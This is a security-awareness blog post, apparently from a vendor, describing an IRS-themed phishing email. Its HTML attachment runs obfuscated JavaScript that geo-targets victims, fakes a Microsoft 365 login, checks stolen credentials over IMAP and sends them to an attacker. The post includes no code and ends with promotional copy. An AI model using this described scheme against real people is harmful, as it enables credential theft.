New IRS Phishing Scam Uses Fake Notices to Steal Microsoft 365 Credentials

New IRS Phishing Scam Uses Fake Notices to Steal Microsoft 365 CredentialsScammers use an “overdue tax bill” along with a sophisticated and obfuscated javascript-based “invoice” attachment to identify targeted victims, validate credentials, and transmit them within seconds.

There’s a common theme that runs through just about every phishing scam that has come across my desk – in each case, there is always some element in the theming or communicated message that is designed to both get the attention of the recipient and turn that recipient into a victim by getting them to act in a desired way.

А new scam identified by the Resecurity HUNTER team shows how the simple claim made in an email to be from the Internal Revenue Service with the message that the recipient has monies owed that is overdue.

In the following scam email, you’ll notice the semi-believable “irs [at]” email address, along with the request to view an attached HTML file “to view and pay the invoice”.

New IRS Phishing Scam Uses Fake Notices to Steal Microsoft 365 Credentials

Diving into the attachment, Resecurity identify the HTML file containing obfuscated JavaScript code that does the following:

  • Checks the victim’s location based on IP address to selectively target countries or regions
  • Presents a spoofed Microsoft 365 logon screen
  • If credentials are presented, checks the credentials validity by attempting to logon via IMAP to Microsoft 365
  • Transmits the credentials back to a threat actor-controlled server

If you look again at the email initially sent, you can make a pretty easy case for Security Awareness Training; the signs there are obvious to a) someone who knows what to look for and b) someone who is actively on the lookout for malicious emails. This is the kind of employee continual Security Awareness Training will create.

Free Phishing Security Test

Would your users fall for convincing phishing attacks? Take the first step now and find out before bad actors do. Plus, see how you stack up against your peers with phishing Industry Benchmarks. The Phish-prone percentage is usually higher than you expect and is great ammo to get budget.

PST ResultsHere's how it works:

  • Immediately start your test for up to 100 users (no need to talk to anyone)
  • Select from 20+ languages and customize the phishing test template based on your environment
  • Choose the landing page your users see after they click
  • Show users which red flags they missed, or a 404 page
  • Get a PDF emailed to you in 24 hours with your Phish-prone % and charts to share with management
  • See how your organization compares to others in your industry

Go Phishing Now!

PS: Don't like to click on redirected buttons? Cut & Paste this link in your browser:

Topics: Phishing

Subscribe to Our Blog

Comprehensive Anti-Phishing Guide

Get the latest about social engineering

Subscribe to CyberheistNews